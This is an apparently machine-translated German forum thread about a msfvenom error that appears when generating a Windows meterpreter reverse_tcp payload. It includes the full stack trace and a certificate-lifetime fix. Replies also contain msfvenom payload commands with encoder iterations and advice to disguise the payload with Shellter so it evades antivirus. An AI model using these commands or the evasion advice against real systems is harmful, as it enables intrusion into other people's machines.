Kali Linux – MSFVenom Nutzlast Erstellung Fehler

Also ich habe gerade installiert Kali Linux Rollen auf meinem Dell Inspiron 5000 Serie, Intel Core I5 (8. Generation)! Und während ich versuchte, erstellen Sie eine Windows-Reverse-TCP-Nutzdaten in MSFVenom, Einer der besten Nutzlast-Erstellung Tools, die mit dem Hacker-OS, ich habe einen Fehler festgestellt. Dies ist, was ich eingegeben:

[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=443 -f exe > Desktop/localpayload.exe

Und das ist, was bekam ich zurück:

/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:50:in `generate_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
from /usr/bin/msfvenom:36:in `init_framework'
from /usr/bin/msfvenom:45:in `framework'
from /usr/bin/msfvenom:327:in `<main>'

Hat jemand eine Idee, was ist hier Los? Bitte lassen Sie mich wissen!

Oh und BTW ich bereits eine Öffentliche Nutzlast und dieser ging zu meinem Lokalen Nutzlast, aber die seltsame Sache ist, dass die öffentlichkeit ein fertig ohne Probleme, was so überhaupt, aber sobald ich die IP-Adresse auf meinem lokalen gibt es mir einen Fehler :(.

InformationsquelleAutor BleachMan210 | 2018-04-10



3 Replies
  1. 1

    Dies ist ein problem, das Auftritt, auf die 32-bit version. Wenn es nicht die Ihnen wichtig sind, verwenden Sie die 64-bit-version.

    Wenn Sie 32bit, dann könnte man ändern Sie die /usr/share/metasploit-framework/lib/msf/core/Nutzlast/android.rb-Datei (etwa Zeile 87) aus

    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
    

    zu

    cert.not_after = cert.not_before + 3600*24*365*2 # 2 years
    

    Bitte beachten Sie, dass dies könnte Auswirkungen auf die Verwendung von android-Nutzlasten.

  2. -1

    Einfachste Virenscanner und native windows-Scanner pick-up dieser Nutzlast und setzen aus roten Flaggen wie verrückt, auch die encoder.

    Empfehle ich Ihnen, herunterladen shellter und es verwenden, um Ihre Maske Nutzlast innerhalb einer ausführbaren Datei ist, die windows-lassen durch. So ziemlich alles funktioniert.

    Plus es hat nur ein verwenden Sie die numerischen multiple-choice-Auswahl von Nutzlasten.

    Einfache und effektive

  3. -2

    Können Sie laufen unter dem Befehl.

    msfvenom -p windows/meterpreter/reverse_tcp -e-x86/shikata_ga_nai -i 5 -eine x86 –Plattform windows LHOST=192.168.1.5 LPORT=443 -f exe – > bösartige file.exe

    • diese Antwort nur Staaten die genau die gleiche Sache, die der Fragesteller sagte, funktioniert nicht….

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.